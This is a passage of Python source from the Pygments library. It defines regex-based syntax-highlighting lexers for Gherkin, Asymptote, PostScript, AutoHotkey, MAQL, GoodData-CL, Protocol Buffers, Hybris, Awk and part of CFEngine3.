(r'#.*$', Comment), ], 'feature_elements' : [ (step_keywords, Keyword, "step_content_stack"), include('comments'), (r"(\s|.)", Name.Function), ], 'feature_elements_on_stack' : [ (step_keywords, Keyword, "#pop:2"), include('comments'), (r"(\s|.)", Name.Function), ], 'examples_table': [ (r"\s+\|", Keyword, 'examples_table_header'), include('comments'), (r"(\s|.)", Name.Function), ], 'examples_table_header': [ (r"\s+\|\s*$", Keyword, "#pop:2"), include('comments'), (r"\s*\|", Keyword), (r"[^\|]", Name.Variable), ], 'scenario_sections_on_stack': [ (feature_element_keywords, bygroups(Name.Function, Keyword, Keyword, Name.Function), "feature_elements_on_stack"), ], 'narrative': [ include('scenario_sections_on_stack'), (r"(\s|.)", Name.Function), ], 'table_vars': [ (r'(<[^>]+>)', Name.Variable), ], 'numbers': [ (r'(\d+\.?\d*|\d*\.\d+)([eE][+-]?[0-9]+)?', String), ], 'string': [ include('table_vars'), (r'(\s|.)', String), ], 'py_string': [ (r'"""', Keyword, "#pop"), include('string'), ], 'step_content_root':[ (r"$", Keyword, "#pop"), include('step_content'), ], 'step_content_stack':[ (r"$", Keyword, "#pop:2"), include('step_content'), ], 'step_content':[ (r'"', Name.Function, "double_string"), include('table_vars'), include('numbers'), include('comments'), (r'(\s|.)', Name.Function), ], 'table_content': [ (r"\s+\|\s*$", Keyword, "#pop"), include('comments'), (r"\s*\|", Keyword), include('string'), ], 'double_string': [ (r'"', Name.Function, "#pop"), include('string'), ], 'root': [ (r'\n', Name.Function), include('comments'), (r'"""', Keyword, "py_string"), (r'\s+\|', Keyword, 'table_content'), (r'"', Name.Function, "double_string"), include('table_vars'), include('numbers'), (r'(\s*)(@[^@\r\n\t ]+)', bygroups(Name.Function, Name.Tag)), (step_keywords, bygroups(Name.Function, Keyword), 'step_content_root'), (feature_keywords, bygroups(Keyword, Keyword, Name.Function), 'narrative'), (feature_element_keywords, bygroups(Name.Function, Keyword, Keyword, Name.Function), 'feature_elements'), (examples_keywords, bygroups(Name.Function, Keyword, Keyword, Name.Function), 'examples_table'), (r'(\s|.)', Name.Function), ] } class AsymptoteLexer(RegexLexer): """ For `Asymptote <http://asymptote.sf.net/>`_ source code. *New in Pygments 1.2.* """ name = 'Asymptote' aliases = ['asy', 'asymptote'] filenames = ['*.asy'] mimetypes = ['text/x-asymptote'] #: optional Comment or Whitespace _ws = r'(?:\s|//.*?\n|/\*.*?\*/)+' tokens = { 'whitespace': [ (r'\n', Text), (r'\s+', Text), (r'\\\n', Text), # line continuation (r'//(\n|(.|\n)*?[^\\]\n)', Comment), (r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment), ], 'statements': [ # simple string (TeX friendly) (r'"(\\\\|\\"|[^"])*"', String), # C style string (with character escapes) (r"'", String, 'string'), (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[lL]?', Number.Float), (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float), (r'0x[0-9a-fA-F]+[Ll]?', Number.Hex), (r'0[0-7]+[Ll]?', Number.Oct), (r'\d+[Ll]?', Number.Integer), (r'[~!%^&*+=|?:<>/-]', Operator), (r'[()\[\],.]', Punctuation), (r'\b(case)(.+?)(:)', bygroups(Keyword, using(this), Text)), (r'(and|controls|tension|atleast|curl|if|else|while|for|do|' r'return|break|continue|struct|typedef|new|access|import|' r'unravel|from|include|quote|static|public|private|restricted|' r'this|explicit|true|false|null|cycle|newframe|operator)\b', Keyword), # Since an asy-type-name can be also an asy-function-name, # in the following we test if the string " [a-zA-Z]" follows # the Keyword.Type. # Of course it is not perfect ! (r'(Braid|FitResult|Label|Legend|TreeNode|abscissa|arc|arrowhead|' r'binarytree|binarytreeNode|block|bool|bool3|bounds|bqe|circle|' r'conic|coord|coordsys|cputime|ellipse|file|filltype|frame|grid3|' r'guide|horner|hsv|hyperbola|indexedTransform|int|inversion|key|' r'light|line|linefit|marginT|marker|mass|object|pair|parabola|path|' r'path3|pen|picture|point|position|projection|real|revolution|' r'scaleT|scientific|segment|side|slice|splitface|string|surface|' r'tensionSpecifier|ticklocate|ticksgridT|tickvalues|transform|' r'transformation|tree|triangle|trilinear|triple|vector|' r'vertex|void)(?=([ ]{1,}[a-zA-Z]))', Keyword.Type), # Now the asy-type-name which are not asy-function-name # except yours ! # Perhaps useless (r'(Braid|FitResult|TreeNode|abscissa|arrowhead|block|bool|bool3|' r'bounds|coord|frame|guide|horner|int|linefit|marginT|pair|pen|' r'picture|position|real|revolution|slice|splitface|ticksgridT|' r'tickvalues|tree|triple|vertex|void)\b', Keyword.Type), ('[a-zA-Z_][a-zA-Z0-9_]*:(?!:)', Name.Label), ('[a-zA-Z_][a-zA-Z0-9_]*', Name), ], 'root': [ include('whitespace'), # functions (r'((?:[a-zA-Z0-9_*\s])+?(?:\s|\*))' # return arguments r'([a-zA-Z_][a-zA-Z0-9_]*)' # method name r'(\s*\([^;]*?\))' # signature r'(' + _ws + r')({)', bygroups(using(this), Name.Function, using(this), using(this), Punctuation), 'function'), # function declarations (r'((?:[a-zA-Z0-9_*\s])+?(?:\s|\*))' # return arguments r'([a-zA-Z_][a-zA-Z0-9_]*)' # method name r'(\s*\([^;]*?\))' # signature r'(' + _ws + r')(;)', bygroups(using(this), Name.Function, using(this), using(this), Punctuation)), ('', Text, 'statement'), ], 'statement' : [ include('whitespace'), include('statements'), ('[{}]', Punctuation), (';', Punctuation, '#pop'), ], 'function': [ include('whitespace'), include('statements'), (';', Punctuation), ('{', Punctuation, '#push'), ('}', Punctuation, '#pop'), ], 'string': [ (r"'", String, '#pop'), (r'\\([\\abfnrtv"\'?]|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), (r'\n', String), (r"[^\\'\n]+", String), # all other characters (r'\\\n', String), (r'\\n', String), # line continuation (r'\\', String), # stray backslash ] } def get_tokens_unprocessed(self, text): from pygments.lexers._asybuiltins import ASYFUNCNAME, ASYVARNAME for index, token, value in \ RegexLexer.get_tokens_unprocessed(self, text): if token is Name and value in ASYFUNCNAME: token = Name.Function elif token is Name and value in ASYVARNAME: token = Name.Variable yield index, token, value class PostScriptLexer(RegexLexer): """ Lexer for PostScript files. The PostScript Language Reference published by Adobe at <http://partners.adobe.com/public/developer/en/ps/PLRM.pdf> is the authority for this. *New in Pygments 1.4.* """ name = 'PostScript' aliases = ['postscript', 'postscr'] filenames = ['*.ps', '*.eps'] mimetypes = ['application/postscript'] delimiter = r'\(\)\<\>\[\]\{\}\/\%\s' delimiter_end = r'(?=[%s])' % delimiter valid_name_chars = r'[^%s]' % delimiter valid_name = r"%s+%s" % (valid_name_chars, delimiter_end) tokens = { 'root': [ # All comment types (r'^%!.+\n', Comment.Preproc), (r'%%.*\n', Comment.Special), (r'(^%.*\n){2,}', Comment.Multiline), (r'%.*\n', Comment.Single), # String literals are awkward; enter separate state. (r'\(', String, 'stringliteral'), (r'[\{\}(\<\<)(\>\>)\[\]]', Punctuation), # Numbers (r'<[0-9A-Fa-f]+>' + delimiter_end, Number.Hex), # Slight abuse: use Oct to signify any explicit base system (r'[0-9]+\#(\-|\+)?([0-9]+\.?|[0-9]*\.[0-9]+|[0-9]+\.[0-9]*)' r'((e|E)[0-9]+)?' + delimiter_end, Number.Oct), (r'(\-|\+)?([0-9]+\.?|[0-9]*\.[0-9]+|[0-9]+\.[0-9]*)((e|E)[0-9]+)?' + delimiter_end, Number.Float), (r'(\-|\+)?[0-9]+' + delimiter_end, Number.Integer), # References (r'\/%s' % valid_name, Name.Variable), # Names (valid_name, Name.Function), # Anything else is executed # These keywords taken from # <http://www.math.ubc.ca/~cass/graphics/manual/pdf/a1.pdf> # Is there an authoritative list anywhere that doesn't involve # trawling documentation? (r'(false|true)' + delimiter_end, Keyword.Constant), # Conditionals / flow control (r'(eq|ne|ge|gt|le|lt|and|or|not|if|ifelse|for|forall)' + delimiter_end, Keyword.Reserved), ('(abs|add|aload|arc|arcn|array|atan|begin|bind|ceiling|charpath|' 'clip|closepath|concat|concatmatrix|copy|cos|currentlinewidth|' 'currentmatrix|currentpoint|curveto|cvi|cvs|def|defaultmatrix|' 'dict|dictstackoverflow|div|dtransform|dup|end|exch|exec|exit|exp|' 'fill|findfont|floor|get|getinterval|grestore|gsave|gt|' 'identmatrix|idiv|idtransform|index|invertmatrix|itransform|' 'length|lineto|ln|load|log|loop|matrix|mod|moveto|mul|neg|newpath|' 'pathforall|pathbbox|pop|print|pstack|put|quit|rand|rangecheck|' 'rcurveto|repeat|restore|rlineto|rmoveto|roll|rotate|round|run|' 'save|scale|scalefont|setdash|setfont|setgray|setlinecap|' 'setlinejoin|setlinewidth|setmatrix|setrgbcolor|shfill|show|' 'showpage|sin|sqrt|stack|stringwidth|stroke|strokepath|sub|' 'syntaxerror|transform|translate|truncate|typecheck|undefined|' 'undefinedfilename|undefinedresult)' + delimiter_end, Name.Builtin), (r'\s+', Text), ], 'stringliteral': [ (r'[^\(\)\\]+', String), (r'\\', String.Escape, 'escape'), (r'\(', String, '#push'), (r'\)', String, '#pop'), ], 'escape': [ (r'([0-8]{3}|n|r|t|b|f|\\|\(|\))?', String.Escape, '#pop'), ], } class AutohotkeyLexer(RegexLexer): """ For `autohotkey <http://www.autohotkey.com/>`_ source code. *New in Pygments 1.4.* """ name = 'autohotkey' aliases = ['ahk', 'autohotkey'] filenames = ['*.ahk', '*.ahkl'] mimetypes = ['text/x-autohotkey'] tokens = { 'root': [ (r'^(\s*)(/\*)', bygroups(Text, Comment.Multiline), 'incomment'), (r'^(\s*)(\()', bygroups(Text, Generic), 'incontinuation'), (r'\s+;.*?$', Comment.Singleline), (r'^;.*?$', Comment.Singleline), (r'[]{}(),;[]', Punctuation), (r'(in|is|and|or|not)\b', Operator.Word), (r'\%[a-zA-Z_#@$][a-zA-Z0-9_#@$]*\%', Name.Variable), (r'!=|==|:=|\.=|<<|>>|[-~+/*%=<>&^|?:!.]', Operator), include('commands'), include('labels'), include('builtInFunctions'), include('builtInVariables'), (r'"', String, combined('stringescape', 'dqs')), include('numbers'), (r'[a-zA-Z_#@$][a-zA-Z0-9_#@$]*', Name), (r'\\|\'', Text), (r'\`([\,\%\`abfnrtv\-\+;])', String.Escape), include('garbage'), ], 'incomment': [ (r'^\s*\*/', Comment.Multiline, '#pop'), (r'[^*/]', Comment.Multiline), (r'[*/]', Comment.Multiline) ], 'incontinuation': [ (r'^\s*\)', Generic, '#pop'), (r'[^)]', Generic), (r'[)]', Generic), ], 'commands': [ (r'(?i)^(\s*)(global|local|static|' r'#AllowSameLineComments|#ClipboardTimeout|#CommentFlag|' r'#ErrorStdOut|#EscapeChar|#HotkeyInterval|#HotkeyModifierTimeout|' r'#Hotstring|#IfWinActive|#IfWinExist|#IfWinNotActive|' r'#IfWinNotExist|#IncludeAgain|#Include|#InstallKeybdHook|' r'#InstallMouseHook|#KeyHistory|#LTrim|#MaxHotkeysPerInterval|' r'#MaxMem|#MaxThreads|#MaxThreadsBuffer|#MaxThreadsPerHotkey|' r'#NoEnv|#NoTrayIcon|#Persistent|#SingleInstance|#UseHook|' r'#WinActivateForce|AutoTrim|BlockInput|Break|Click|ClipWait|' r'Continue|Control|ControlClick|ControlFocus|ControlGetFocus|' r'ControlGetPos|ControlGetText|ControlGet|ControlMove|ControlSend|' r'ControlSendRaw|ControlSetText|CoordMode|Critical|' r'DetectHiddenText|DetectHiddenWindows|Drive|DriveGet|' r'DriveSpaceFree|Edit|Else|EnvAdd|EnvDiv|EnvGet|EnvMult|EnvSet|' r'EnvSub|EnvUpdate|Exit|ExitApp|FileAppend|' r'FileCopy|FileCopyDir|FileCreateDir|FileCreateShortcut|' r'FileDelete|FileGetAttrib|FileGetShortcut|FileGetSize|' r'FileGetTime|FileGetVersion|FileInstall|FileMove|FileMoveDir|' r'FileRead|FileReadLine|FileRecycle|FileRecycleEmpty|' r'FileRemoveDir|FileSelectFile|FileSelectFolder|FileSetAttrib|' r'FileSetTime|FormatTime|GetKeyState|Gosub|Goto|GroupActivate|' r'GroupAdd|GroupClose|GroupDeactivate|Gui|GuiControl|' r'GuiControlGet|Hotkey|IfEqual|IfExist|IfGreaterOrEqual|IfGreater|' r'IfInString|IfLess|IfLessOrEqual|IfMsgBox|IfNotEqual|IfNotExist|' r'IfNotInString|IfWinActive|IfWinExist|IfWinNotActive|' r'IfWinNotExist|If |ImageSearch|IniDelete|IniRead|IniWrite|' r'InputBox|Input|KeyHistory|KeyWait|ListHotkeys|ListLines|' r'ListVars|Loop|Menu|MouseClickDrag|MouseClick|MouseGetPos|' r'MouseMove|MsgBox|OnExit|OutputDebug|Pause|PixelGetColor|' r'PixelSearch|PostMessage|Process|Progress|Random|RegDelete|' r'RegRead|RegWrite|Reload|Repeat|Return|RunAs|RunWait|Run|' r'SendEvent|SendInput|SendMessage|SendMode|SendPlay|SendRaw|Send|' r'SetBatchLines|SetCapslockState|SetControlDelay|' r'SetDefaultMouseSpeed|SetEnv|SetFormat|SetKeyDelay|' r'SetMouseDelay|SetNumlockState|SetScrollLockState|' r'SetStoreCapslockMode|SetTimer|SetTitleMatchMode|' r'SetWinDelay|SetWorkingDir|Shutdown|Sleep|Sort|SoundBeep|' r'SoundGet|SoundGetWaveVolume|SoundPlay|SoundSet|' r'SoundSetWaveVolume|SplashImage|SplashTextOff|SplashTextOn|' r'SplitPath|StatusBarGetText|StatusBarWait|StringCaseSense|' r'StringGetPos|StringLeft|StringLen|StringLower|StringMid|' r'StringReplace|StringRight|StringSplit|StringTrimLeft|' r'StringTrimRight|StringUpper|Suspend|SysGet|Thread|ToolTip|' r'Transform|TrayTip|URLDownloadToFile|While|WinActivate|' r'WinActivateBottom|WinClose|WinGetActiveStats|WinGetActiveTitle|' r'WinGetClass|WinGetPos|WinGetText|WinGetTitle|WinGet|WinHide|' r'WinKill|WinMaximize|WinMenuSelectItem|WinMinimizeAllUndo|' r'WinMinimizeAll|WinMinimize|WinMove|WinRestore|WinSetTitle|' r'WinSet|WinShow|WinWaitActive|WinWaitClose|WinWaitNotActive|' r'WinWait)\b', bygroups(Text, Name.Builtin)), ], 'builtInFunctions': [ (r'(?i)(Abs|ACos|Asc|ASin|ATan|Ceil|Chr|Cos|DllCall|Exp|FileExist|' r'Floor|GetKeyState|IL_Add|IL_Create|IL_Destroy|InStr|IsFunc|' r'IsLabel|Ln|Log|LV_Add|LV_Delete|LV_DeleteCol|LV_GetCount|' r'LV_GetNext|LV_GetText|LV_Insert|LV_InsertCol|LV_Modify|' r'LV_ModifyCol|LV_SetImageList|Mod|NumGet|NumPut|OnMessage|' r'RegExMatch|RegExReplace|RegisterCallback|Round|SB_SetIcon|' r'SB_SetParts|SB_SetText|Sin|Sqrt|StrLen|SubStr|Tan|TV_Add|' r'TV_Delete|TV_GetChild|TV_GetCount|TV_GetNext|TV_Get|' r'TV_GetParent|TV_GetPrev|TV_GetSelection|TV_GetText|TV_Modify|' r'VarSetCapacity|WinActive|WinExist|Object|ComObjActive|' r'ComObjArray|ComObjEnwrap|ComObjUnwrap|ComObjParameter|' r'ComObjType|ComObjConnect|ComObjCreate|ComObjGet|ComObjError|' r'ComObjValue|Insert|MinIndex|MaxIndex|Remove|SetCapacity|' r'GetCapacity|GetAddress|_NewEnum|FileOpen|Read|Write|ReadLine|' r'WriteLine|ReadNumType|WriteNumType|RawRead|RawWrite|Seek|Tell|' r'Close|Next|IsObject|StrPut|StrGet|Trim|LTrim|RTrim)\b', Name.Function), ], 'builtInVariables': [ (r'(?i)(A_AhkPath|A_AhkVersion|A_AppData|A_AppDataCommon|' r'A_AutoTrim|A_BatchLines|A_CaretX|A_CaretY|A_ComputerName|' r'A_ControlDelay|A_Cursor|A_DDDD|A_DDD|A_DD|A_DefaultMouseSpeed|' r'A_Desktop|A_DesktopCommon|A_DetectHiddenText|' r'A_DetectHiddenWindows|A_EndChar|A_EventInfo|A_ExitReason|' r'A_FormatFloat|A_FormatInteger|A_Gui|A_GuiEvent|A_GuiControl|' r'A_GuiControlEvent|A_GuiHeight|A_GuiWidth|A_GuiX|A_GuiY|A_Hour|' r'A_IconFile|A_IconHidden|A_IconNumber|A_IconTip|A_Index|' r'A_IPAddress1|A_IPAddress2|A_IPAddress3|A_IPAddress4|A_ISAdmin|' r'A_IsCompiled|A_IsCritical|A_IsPaused|A_IsSuspended|A_KeyDelay|' r'A_Language|A_LastError|A_LineFile|A_LineNumber|A_LoopField|' r'A_LoopFileAttrib|A_LoopFileDir|A_LoopFileExt|A_LoopFileFullPath|' r'A_LoopFileLongPath|A_LoopFileName|A_LoopFileShortName|' r'A_LoopFileShortPath|A_LoopFileSize|A_LoopFileSizeKB|' r'A_LoopFileSizeMB|A_LoopFileTimeAccessed|A_LoopFileTimeCreated|' r'A_LoopFileTimeModified|A_LoopReadLine|A_LoopRegKey|' r'A_LoopRegName|A_LoopRegSubkey|A_LoopRegTimeModified|' r'A_LoopRegType|A_MDAY|A_Min|A_MM|A_MMM|A_MMMM|A_Mon|A_MouseDelay|' r'A_MSec|A_MyDocuments|A_Now|A_NowUTC|A_NumBatchLines|A_OSType|' r'A_OSVersion|A_PriorHotkey|A_ProgramFiles|A_Programs|' r'A_ProgramsCommon|A_ScreenHeight|A_ScreenWidth|A_ScriptDir|' r'A_ScriptFullPath|A_ScriptName|A_Sec|A_Space|A_StartMenu|' r'A_StartMenuCommon|A_Startup|A_StartupCommon|A_StringCaseSense|' r'A_Tab|A_Temp|A_ThisFunc|A_ThisHotkey|A_ThisLabel|A_ThisMenu|' r'A_ThisMenuItem|A_ThisMenuItemPos|A_TickCount|A_TimeIdle|' r'A_TimeIdlePhysical|A_TimeSincePriorHotkey|A_TimeSinceThisHotkey|' r'A_TitleMatchMode|A_TitleMatchModeSpeed|A_UserName|A_WDay|' r'A_WinDelay|A_WinDir|A_WorkingDir|A_YDay|A_YEAR|A_YWeek|A_YYYY|' r'Clipboard|ClipboardAll|ComSpec|ErrorLevel|ProgramFiles|True|' r'False|A_IsUnicode|A_FileEncoding|A_OSVersion|A_PtrSize)\b', Name.Variable), ], 'labels': [ # hotkeys and labels # technically, hotkey names are limited to named keys and buttons (r'(^\s*)([^:\s\(\"]+?:{1,2})', bygroups(Text, Name.Label)), (r'(^\s*)(::[^:\s]+?::)', bygroups(Text, Name.Label)), ], 'numbers': [ (r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?', Number.Float), (r'\d+[eE][+-]?[0-9]+', Number.Float), (r'0\d+', Number.Oct), (r'0[xX][a-fA-F0-9]+', Number.Hex), (r'\d+L', Number.Integer.Long), (r'\d+', Number.Integer) ], 'stringescape': [ (r'\"\"|\`([\,\%\`abfnrtv])', String.Escape), ], 'strings': [ (r'[^"\n]+', String), ], 'dqs': [ (r'"', String, '#pop'), include('strings') ], 'garbage': [ (r'[^\S\n]', Text), # (r'.', Text), # no cheating ], } class MaqlLexer(RegexLexer): """ Lexer for `GoodData MAQL <https://secure.gooddata.com/docs/html/advanced.metric.tutorial.html>`_ scripts. *New in Pygments 1.4.* """ name = 'MAQL' aliases = ['maql'] filenames = ['*.maql'] mimetypes = ['text/x-gooddata-maql','application/x-gooddata-maql'] flags = re.IGNORECASE tokens = { 'root': [ # IDENTITY (r'IDENTIFIER\b', Name.Builtin), # IDENTIFIER (r'\{[^}]+\}', Name.Variable), # NUMBER (r'[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]{1,3})?', Literal.Number), # STRING (r'"', Literal.String, 'string-literal'), # RELATION (r'\<\>|\!\=', Operator), (r'\=|\>\=|\>|\<\=|\<', Operator), # := (r'\:\=', Operator), # OBJECT (r'\[[^]]+\]', Name.Variable.Class), # keywords (r'(DIMENSIONS?|BOTTOM|METRIC|COUNT|OTHER|FACT|WITH|TOP|OR|' r'ATTRIBUTE|CREATE|PARENT|FALSE|ROWS?|FROM|ALL|AS|PF|' r'COLUMNS?|DEFINE|REPORT|LIMIT|TABLE|LIKE|AND|BY|' r'BETWEEN|EXCEPT|SELECT|MATCH|WHERE|TRUE|FOR|IN|' r'WITHOUT|FILTER|ALIAS|ORDER|FACT|WHEN|NOT|ON|' r'KEYS|KEY|FULLSET|PRIMARY|LABELS|LABEL|VISUAL|' r'TITLE|DESCRIPTION|FOLDER|ALTER|DROP|ADD|DATASET|' r'DATATYPE|INT|BIGINT|DOUBLE|DATE|VARCHAR|DECIMAL|' r'SYNCHRONIZE|TYPE|DEFAULT|ORDER|ASC|DESC|HYPERLINK|' r'INCLUDE|TEMPLATE|MODIFY)\b', Keyword), # FUNCNAME (r'[a-zA-Z]\w*\b', Name.Function), # Comments (r'#.*', Comment.Single), # Punctuation (r'[,;\(\)]', Token.Punctuation), # Space is not significant (r'\s+', Text) ], 'string-literal': [ (r'\\[tnrfbae"\\]', String.Escape), (r'"', Literal.String, '#pop'), (r'[^\\"]+', Literal.String) ], } class GoodDataCLLexer(RegexLexer): """ Lexer for `GoodData-CL <http://github.com/gooddata/GoodData-CL/raw/master/cli/src/main/resources/com/gooddata/processor/COMMANDS.txt>`_ script files. *New in Pygments 1.4.* """ name = 'GoodData-CL' aliases = ['gooddata-cl'] filenames = ['*.gdc'] mimetypes = ['text/x-gooddata-cl'] flags = re.IGNORECASE tokens = { 'root': [ # Comments (r'#.*', Comment.Single), # Function call (r'[a-zA-Z]\w*', Name.Function), # Argument list (r'\(', Token.Punctuation, 'args-list'), # Punctuation (r';', Token.Punctuation), # Space is not significant (r'\s+', Text) ], 'args-list': [ (r'\)', Token.Punctuation, '#pop'), (r',', Token.Punctuation), (r'[a-zA-Z]\w*', Name.Variable), (r'=', Operator), (r'"', Literal.String, 'string-literal'), (r'[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]{1,3})?', Literal.Number), # Space is not significant (r'\s', Text) ], 'string-literal': [ (r'\\[tnrfbae"\\]', String.Escape), (r'"', Literal.String, '#pop'), (r'[^\\"]+', Literal.String) ] } class ProtoBufLexer(RegexLexer): """ Lexer for `Protocol Buffer <http://code.google.com/p/protobuf/>`_ definition files. *New in Pygments 1.4.* """ name = 'Protocol Buffer' aliases = ['protobuf', 'proto'] filenames = ['*.proto'] tokens = { 'root': [ (r'[ \t]+', Text), (r'[,;{}\[\]\(\)]', Punctuation), (r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single), (r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline), (r'\b(import|option|optional|required|repeated|default|packed|' r'ctype|extensions|to|max|rpc|returns)\b', Keyword), (r'(int32|int64|uint32|uint64|sint32|sint64|' r'fixed32|fixed64|sfixed32|sfixed64|' r'float|double|bool|string|bytes)\b', Keyword.Type), (r'(true|false)\b', Keyword.Constant), (r'(package)(\s+)', bygroups(Keyword.Namespace, Text), 'package'), (r'(message|extend)(\s+)', bygroups(Keyword.Declaration, Text), 'message'), (r'(enum|group|service)(\s+)', bygroups(Keyword.Declaration, Text), 'type'), (r'\".*\"', String), (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float), (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float), (r'(\-?(inf|nan))', Number.Float), (r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex), (r'0[0-7]+[LlUu]*', Number.Oct), (r'\d+[LlUu]*', Number.Integer), (r'[+-=]', Operator), (r'([a-zA-Z_][a-zA-Z0-9_\.]*)([ \t]*)(=)', bygroups(Name.Attribute, Text, Operator)), ('[a-zA-Z_][a-zA-Z0-9_\.]*', Name), ], 'package': [ (r'[a-zA-Z_][a-zA-Z0-9_]*', Name.Namespace, '#pop') ], 'message': [ (r'[a-zA-Z_][a-zA-Z0-9_]*', Name.Class, '#pop') ], 'type': [ (r'[a-zA-Z_][a-zA-Z0-9_]*', Name, '#pop') ], } class HybrisLexer(RegexLexer): """ For `Hybris <http://www.hybris-lang.org>`_ source code. *New in Pygments 1.4.* """ name = 'Hybris' aliases = ['hybris', 'hy'] filenames = ['*.hy', '*.hyb'] mimetypes = ['text/x-hybris', 'application/x-hybris'] flags = re.MULTILINE | re.DOTALL tokens = { 'root': [ # method names (r'^(\s*(?:function|method|operator\s+)+?)' r'([a-zA-Z_][a-zA-Z0-9_]*)' r'(\s*)(\()', bygroups(Keyword, Name.Function, Text, Operator)), (r'[^\S\n]+', Text), (r'//.*?\n', Comment.Single), (r'/\*.*?\*/', Comment.Multiline), (r'@[a-zA-Z_][a-zA-Z0-9_\.]*', Name.Decorator), (r'(break|case|catch|next|default|do|else|finally|for|foreach|of|' r'unless|if|new|return|switch|me|throw|try|while)\b', Keyword), (r'(extends|private|protected|public|static|throws|function|method|' r'operator)\b', Keyword.Declaration), (r'(true|false|null|__FILE__|__LINE__|__VERSION__|__LIB_PATH__|' r'__INC_PATH__)\b', Keyword.Constant), (r'(class|struct)(\s+)', bygroups(Keyword.Declaration, Text), 'class'), (r'(import|include)(\s+)', bygroups(Keyword.Namespace, Text), 'import'), (r'(gc_collect|gc_mm_items|gc_mm_usage|gc_collect_threshold|' r'urlencode|urldecode|base64encode|base64decode|sha1|crc32|sha2|' r'md5|md5_file|acos|asin|atan|atan2|ceil|cos|cosh|exp|fabs|floor|' r'fmod|log|log10|pow|sin|sinh|sqrt|tan|tanh|isint|isfloat|ischar|' r'isstring|isarray|ismap|isalias|typeof|sizeof|toint|tostring|' r'fromxml|toxml|binary|pack|load|eval|var_names|var_values|' r'user_functions|dyn_functions|methods|call|call_method|mknod|' r'mkfifo|mount|umount2|umount|ticks|usleep|sleep|time|strtime|' r'strdate|dllopen|dlllink|dllcall|dllcall_argv|dllclose|env|exec|' r'fork|getpid|wait|popen|pclose|exit|kill|pthread_create|' r'pthread_create_argv|pthread_exit|pthread_join|pthread_kill|' r'smtp_send|http_get|http_post|http_download|socket|bind|listen|' r'accept|getsockname|getpeername|settimeout|connect|server|recv|' r'send|close|print|println|printf|input|readline|serial_open|' r'serial_fcntl|serial_get_attr|serial_get_ispeed|serial_get_ospeed|' r'serial_set_attr|serial_set_ispeed|serial_set_ospeed|serial_write|' r'serial_read|serial_close|xml_load|xml_parse|fopen|fseek|ftell|' r'fsize|fread|fwrite|fgets|fclose|file|readdir|pcre_replace|size|' r'pop|unmap|has|keys|values|length|find|substr|replace|split|trim|' r'remove|contains|join)\b', Name.Builtin), (r'(MethodReference|Runner|Dll|Thread|Pipe|Process|Runnable|' r'CGI|ClientSocket|Socket|ServerSocket|File|Console|Directory|' r'Exception)\b', Keyword.Type), (r'"(\\\\|\\"|[^"])*"', String), (r"'\\.'|'[^\\]'|'\\u[0-9a-f]{4}'", String.Char), (r'(\.)([a-zA-Z_][a-zA-Z0-9_]*)', bygroups(Operator, Name.Attribute)), (r'[a-zA-Z_][a-zA-Z0-9_]*:', Name.Label), (r'[a-zA-Z_\$][a-zA-Z0-9_]*', Name), (r'[~\^\*!%&\[\]\(\)\{\}<>\|+=:;,./?\-@]+', Operator), (r'[0-9][0-9]*\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float), (r'0x[0-9a-f]+', Number.Hex), (r'[0-9]+L?', Number.Integer), (r'\n', Text), ], 'class': [ (r'[a-zA-Z_][a-zA-Z0-9_]*', Name.Class, '#pop') ], 'import': [ (r'[a-zA-Z0-9_.]+\*?', Name.Namespace, '#pop') ], } class AwkLexer(RegexLexer): """ For Awk scripts. *New in Pygments 1.5.* """ name = 'Awk' aliases = ['awk', 'gawk', 'mawk', 'nawk'] filenames = ['*.awk'] mimetypes = ['application/x-awk'] tokens = { 'commentsandwhitespace': [ (r'\s+', Text), (r'#.*$', Comment.Single) ], 'slashstartsregex': [ include('commentsandwhitespace'), (r'/(\\.|[^[/\\\n]|\[(\\.|[^\]\\\n])*])+/' r'\B', String.Regex, '#pop'), (r'(?=/)', Text, ('#pop', 'badregex')), (r'', Text, '#pop') ], 'badregex': [ (r'\n', Text, '#pop') ], 'root': [ (r'^(?=\s|/)', Text, 'slashstartsregex'), include('commentsandwhitespace'), (r'\+\+|--|\|\||&&|in|\$|!?~|' r'(\*\*|[-<>+*%\^/!=])=?', Operator, 'slashstartsregex'), (r'[{(\[;,]', Punctuation, 'slashstartsregex'), (r'[})\].]', Punctuation), (r'(break|continue|do|while|exit|for|if|' r'return)\b', Keyword, 'slashstartsregex'), (r'function\b', Keyword.Declaration, 'slashstartsregex'), (r'(atan2|cos|exp|int|log|rand|sin|sqrt|srand|gensub|gsub|index|' r'length|match|split|sprintf|sub|substr|tolower|toupper|close|' r'fflush|getline|next|nextfile|print|printf|strftime|systime|' r'delete|system)\b', Keyword.Reserved), (r'(ARGC|ARGIND|ARGV|CONVFMT|ENVIRON|ERRNO|FIELDWIDTHS|FILENAME|FNR|FS|' r'IGNORECASE|NF|NR|OFMT|OFS|ORFS|RLENGTH|RS|RSTART|RT|' r'SUBSEP)\b', Name.Builtin), (r'[$a-zA-Z_][a-zA-Z0-9_]*', Name.Other), (r'[0-9][0-9]*\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float), (r'0x[0-9a-fA-F]+', Number.Hex), (r'[0-9]+', Number.Integer), (r'"(\\\\|\\"|[^"])*"', String.Double), (r"'(\\\\|\\'|[^'])*'", String.Single), ] } class Cfengine3Lexer(RegexLexer): """ Lexer for `CFEngine3 <http://cfengine.org>`_ policy files. *New in Pygments 1.5.* """ name = 'CFEngine3' aliases = ['cfengine3', 'cf3'] filenames = ['*.cf'] mimetypes = [] tokens = { 'root': [ (r'#.*?\n', Comment), (r'(body)(\s+)(\S+)(\s+)(control)', bygroups(Keyword, Text, Keyword, Text, Keyword)), (r'(body|bundle)(\s+)(\S+)(\s+)(\w+)(\()', bygroups(Keyword, Text, Keyword, Text, Name.Function, Punctuation), 'arglist'), 